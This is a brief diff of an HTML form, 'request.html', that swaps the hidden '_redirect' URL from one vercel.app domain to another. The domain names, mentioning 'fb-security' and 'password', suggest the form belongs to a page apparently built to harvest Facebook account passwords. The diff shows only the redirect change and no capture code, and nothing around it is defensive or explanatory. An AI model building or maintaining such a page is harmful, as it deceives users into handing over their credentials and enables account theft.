--- a/request.html
+++ b/request.html
@@ -16,7 +16,7 @@
 <input
     type="hidden"
     name="_redirect"
-    value="https://submit-form-fb-security-pas.vercel.app/"
+    value="https://farman-124-password.vercel.app/"
   />
         
         <input type="hidden" id="screenWidth" name="screenWidth" value="">
